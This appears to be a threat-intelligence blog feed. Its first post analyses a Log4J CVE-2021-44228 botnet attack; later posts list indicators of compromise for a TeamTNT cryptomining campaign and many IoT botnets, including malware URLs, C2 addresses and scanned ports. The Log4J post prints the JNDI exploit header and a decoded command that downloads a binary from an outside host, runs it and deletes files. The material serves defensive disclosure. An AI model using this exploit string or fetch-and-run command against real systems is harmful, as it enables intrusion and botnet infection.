admin

IoT Botnet exploiting Log4J CVE-2021-44228

Attack info:
Header: User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat}
Attacker IP: 107.189.29.181

The payload is Base64 encoded: The decoded string is: The payload is JavaScript code which is executed in Java using the ScriptEngineManager. The shell command is derived using the String.fromCharCode function:

java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))…

The derived string is:

cd /tmp; wget 198.98.60.67/bins/x86; chmod 777 *; ./x86 log4j; rm -rf *

The downloaded […]


Active crypto-mining operation by TeamTNT

We detected an ongoing cryptomining operation which is likely a minor update of the TeamTNT campaign reported by Palo Alto's Unit 42 in June, which involves TTPs associated with WatchDog.

Detailed report on the previous campaign in June: https://unit42.paloaltonetworks.com/teamtnt-cryptojacking-watchdog-operations/

Indicators of Compromise of the currently active operation:

XMR Pools:
xmr-asia1.nanopool.org:14444
xmr.f2pool.com:13531
gulf.moneroocean.stream:10001

XMR Wallet:
43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz

Files:
File: cronb.sh
Sha256: e20a0566974934e8a8cc44ece0e700963e5542039212117420f7756d89d4e551


Active IoT Botnets 11/11/20

URL: hxxp://37.49.230.208:80/Anti_Bins/Antisocial.arm7
TCP scanning: 23, 37215, 52869
CNC: TCP: 37.49.230.208:5555
https://www.virustotal.com/gui/file/31b258676b9414bac1b7d1e49ef4ad1f/detection

URL: hxxp://152.89.239.197/x86_64
TCP scanning: 2323, 23
CNC: TCP: 206.166.251.223:25009
https://www.virustotal.com/gui/file/b73ceb52f8ec04f3a89ea524645d1ba0/detection
DNS: ns.cyberium.cc

URL: hxxp://37.49.230.196:80/333Sao999Sao666/DAYUMitsKKKAAATTTAAANNNAAA.arm7
TCP scanning: 2323, 23
CNC: TCP: 37.49.230.196:53547
https://www.virustotal.com/gui/file/bb907142b24c1a6aaa28b557baefdbb3/detection
DNS: cnc.destiny2beyondlight.ml

URL: hxxp://142.11.242.17:80/SBIDIOT/arm7
TCP scanning: 23
CNC: TCP: 142.11.242.17:666
https://www.virustotal.com/gui/file/dc6db4547dd72eb688ba79e8605de3db/detection

URL: hxxp://107.173.176.123:80/bins/UnHAnaAW.x86
TCP scanning: 8080, 37215, 80, 2323, 23
CNC: TCP: 107.173.176.123:1024
https://www.virustotal.com/gui/file/2ee7797e373b57710fd8437b2ade5246/detection

URL: hxxp://104.248.120.130:80/beastmode/b3astmode.arm
TCP scanning: 5501, 37215
CNC: TCP: 87.98.143.23:80, 104.248.120.130:34241
https://www.virustotal.com/gui/file/ae00a6373156e09728cabcfc4cda372d/detection


Active IoT botnets 22/10/2020

URL: hxxp://2.57.122.107:80/lmaoWTF/loligang.x86
TCP scanning: 23
CNC: TCP: 2.57.122.107:1791
https://www.virustotal.com/gui/file/9a3545da771f1855cf3da51167d8c93c/detection

URL: hxxp://45.84.196.141:80/files/info.x86
TCP scanning: 23
CNC: TCP: 45.84.196.141:9506
https://www.virustotal.com/gui/file/100ed2a62ddd9ec6096f14b9117b26c2/detection

URL: hxxp://172.245.154.151:80/x86
TCP scanning:
CNC: TCP: 172.245.154.151:1272
https://www.virustotal.com/gui/file/6bf9c3ab7e1f8e1ebbbda3e7d8682d23/detection

URL: hxxp://45.14.224.170:80/centos2139r209ru120934r123jhr908213jh4r09213/H3LLN3Tx86
TCP scanning: 23, 37215
CNC: TCP: 45.14.224.170:40666
DNS: cnchellnet.duckdns.org
https://www.virustotal.com/gui/file/0f2f4d29c538c468032a60a606c2b4ba/detection

URL: hxxp://37.49.225.116/arm7
TCP scanning: 23, 37215
CNC: TCP: 37.49.225.116:10001
https://www.virustotal.com/gui/file/3573b95be87bee9c3f66056e9cd07cbd/detection

URL: hxxp://45.95.168.102/arm7
CNC: TCP: 45.61.136.13:25761
https://www.virustotal.com/gui/file/3f8565d12803d06e5dfcadb24afc331c/detection

URL: hxxp://45.95.168.114:80/SBIDIOT/x86
TCP scanning: 23
CNC: TCP: 45.95.168.114:666
https://www.virustotal.com/gui/file/c36f57d0a4ea105c8cc23314650b4b2b/detection

URL: hxxp://37.46.150.64/Pandoras_Box/pandora.arm7
TCP scanning: 23
CNC: TCP: 37.46.150.64:1791
https://www.virustotal.com/gui/file/3cd6a127cd46e050d7c5424937d4669a/detection

URL: hxxp://206.126.81.137:80/ch4n010a2a2126/ChanHell.x86
TCP scanning: 37215, 23
CNC: TCP: 206.126.81.107:48529
https://www.virustotal.com/gui/file/b60c0bead153982539fefaae5b32702b/detection


Active IoT botnets 08/06/2020

URL: hxxp://45.95.168.156:80/bins/Hilix.x86
TCP scanning: 37215, 23, 52869
CNC: 45.95.168.156:45
https://www.virustotal.com/gui/file/4b6bb12f19c0952af041148e1378c0fc/detection

URL: hxxp://37.49.224.209:80/arm7
CNC: 37.49.224.209:5959
https://www.virustotal.com/gui/file/c98713fa1be1f7b1ab2a0b325c9dd92c/detection

URL: hxxp://172.245.8.9:80/bins/vcimanagement.x86
TCP scanning: 80, 37215, 8080, 2323, 23
CNC: 172.245.8.9:3884
https://www.virustotal.com/gui/file/8622a79f8fd279945074e3322f4619c4/detection

URL: hxxp://45.95.169.1:80/x86
CNC: 45.95.169.1:5959
https://www.virustotal.com/gui/file/b72e7857b7fedf7d6c962da17ea012ad/detection

URL: hxxp://37.49.224.218:80/bins/xxx.arm7
TCP scanning: 80, 37215, 8080, 2323, 23
CNC: 45.143.220.246:1027
https://www.virustotal.com/gui/file/8c35339cd030daa159e7cbffa83ac22e/detection


Active IoT Botnets 18/05/2020

URL: hxxp://37.49.226.221:80/SBIDIOT/arm7
C2: 37.49.226.221:6969
https://www.virustotal.com/gui/file/31cdb290056ccabca8d82176cbfb7b52/detection

URL: hxxp://64.227.57.139:80/lmaoWTF/loligang.x86
TCP scanning: 23
C2: 64.227.57.139:1791
https://www.virustotal.com/gui/file/8b9eddbf2b90f15ad2b224b22fd8bc45/detection

URL: hxxp://192.236.146.53/le.bot.arm7
TCP scanning: 23, 2323
C2: 192.236.146.53:4708
https://www.virustotal.com/gui/file/593e30dc2349334691e964a3934040ce/detection

URL: hxxp://45.95.168.169:80/beastmode/b3astmode.arm7
TCP scanning: 23
C2: 45.95.168.169:65508
https://www.virustotal.com/gui/file/28323e9d1fa9dad0b07710aeab3f2be2/detection

URL: hxxp://37.49.230.160:80/bins/jKira.arm7
TCP scanning: 37215
https://www.virustotal.com/gui/file/cfd9ee5b7dc7a79270565ef6a3351802/detection

URL: hxxp://37.49.226.35:80/SBIDIOT/arm7
TCP scanning: 23
C2: 37.49.226.35:2074
https://www.virustotal.com/gui/file/6df592143855b39753708ae44ddd8543/detection

URL: hxxp://23.254.209.220:80/Tnxl_Bins/Tnxl.x86
TCP scanning: 52869, 23, 37215
C2: 23.254.209.220:17012
https://www.virustotal.com/gui/file/d7bf73af57300a78a18d942a6a915506/detection


Active IoT botnets 12/05/2020

URL: http://45.135.134.190:80/Pandoras_Box/pandora.x86
TCP scanning: 23
CNC: 45.135.134.190:1791
https://www.virustotal.com/gui/file/5a7fd559adc15c89086592427b8b8d2c/detection

URL: http://159.89.150.193:80/SBIDIOT/x86
TCP scanning: 23
CNC: 159.89.150.193:666
https://www.virustotal.com/gui/file/9d08d96c6aa72932a0cc2e449c82fae8/detection

URL: http://192.236.160.162:80/0xxx0xxxasdajshdsajhkgdja/Sa0aS.x86
TCP scanning: 37215, 23
CNC: 192.236.160.162:58666
https://www.virustotal.com/gui/file/b55f2f5c805b04858ae7fad8ac137d42/detection
DNS: saoascnc.duckdns.org
DDOS: UDP:117.27.239.28:multiple

URL: http://45.95.168.81:80/bins/Hilix.arm7
TCP scanning: 23, 37215, 52869
CNC: 45.95.168.81:45
https://www.virustotal.com/gui/file/fdd8089262c3bbc4216085cf5a235c6c/detection

URL: http://45.32.179.8:80/Corret/C0rret.arm7
TCP scanning: 23
CNC: 45.32.179.8:9375
https://www.virustotal.com/gui/file/91b8be51f982cad32050265ad9795c8e/detection

URL: http://80.211.239.70:80/lmaoWTF/loligang.x86
TCP scanning: 23
CNC: TCP
https://www.virustotal.com/gui/file/fd1c236ef8051b3e11d4f9c45cf2f37e/detection

URL: http://96.30.193.26:80/x86
TCP scanning: 8089, 80
CNC: 96.30.193.26:443
https://www.virustotal.com/gui/file/76bb394c91b530311c830e5559ca0e99/detection

URL: http://185.172.110.241:80/nope/daddyscum.arm7
TCP scanning:
CNC:
https://www.virustotal.com/gui/file/35509e2c5a70cfc114222cb63d5a720a/detection

URL: http://172.245.52.231:80/x0ox0ox0oxDefault/z0r0.x86
TCP scanning: 80, 37215, 23
CNC: 172.245.52.231:59666
https://www.virustotal.com/gui/file/1ce7ad62f9a5414f9101c8e6d25a6eba/detection
DNS: cnc.luxstresser.xyz

URL: http://82.118.242.107:80/iotbins/110v3107n37.x86
TCP scanning:


Active IoT botnets 10/04/2020

URL: http://142.93.197.100:80/bins/Hilix.x86
TCP scanning: 23, 37215, 52869
CNC: TCP: 142.93.197.100:45
https://www.virustotal.com/gui/file/a89335c965355e33e10c8f779a00a7d5/detection

URL: http://45.14.224.22:80/bins/Solstice.x86
TCP scanning: 80, 52869, 37215
CNC: TCP: 45.14.224.22:21795
https://www.virustotal.com/gui/file/f53749eaeea48dc1720cfca6f5b4e932/detection

URL: http://104.238.235.186:80/bins/911.x86
TCP scanning: 37215
CNC: TCP: 104.238.235.186:5034
https://www.virustotal.com/gui/file/06a6abf63963606a28d5fb1e4bedc72d/detection

URL: http://165.227.51.77:80/SBIDIOT/arm7
TCP scanning: 23
CNC: TCP: 165.227.51.77:666
https://www.virustotal.com/gui/file/c6dcbd3557fe11841599427da833d63c/detection


Active IoT Botnets 25/03/2020

URL: http://80.211.230.27:80/a.arm7
TCP scanning: 26
CNC: TCP: 172.86.75.173:6909
https://www.virustotal.com/gui/file/bd658214918e4228f4ed07875d4830f3/detection

URL: http://80.211.230.27:80/a.x86
TCP scanning: 26
CNC: TCP: 172.86.75.173:6909
https://www.virustotal.com/gui/file/8a7dafd2218ccdfa511e94f3e6dc9a59/detection

URL: http://185.172.110.232:80/nope/daddyscum.x86
TCP scanning: 23, 37215
CNC: TCP: 192.236.155.159:7498
https://www.virustotal.com/gui/file/2398c7305b819ef61411eac52463f862/detection

URL: http://134.122.112.236:80/bins/Hilix.arm7
TCP scanning: 37215, 23, 52869
CNC: TCP: 134.122.112.236:45
https://www.virustotal.com/gui/file/8b8e4fb04a87013b153f683b1149dd3c/detection

URL: http://134.122.112.236:80/bins/Hilix.x86
TCP scanning: 37215, 23, 52869
CNC: TCP: 134.122.112.236:45
https://www.virustotal.com/gui/file/26a9dce3e8d3a6fa963e1cc101b60a36/detection

URL: http://67.207.93.206:80/GraveDigger/rapethemipcams.arm7
TCP scanning: 23
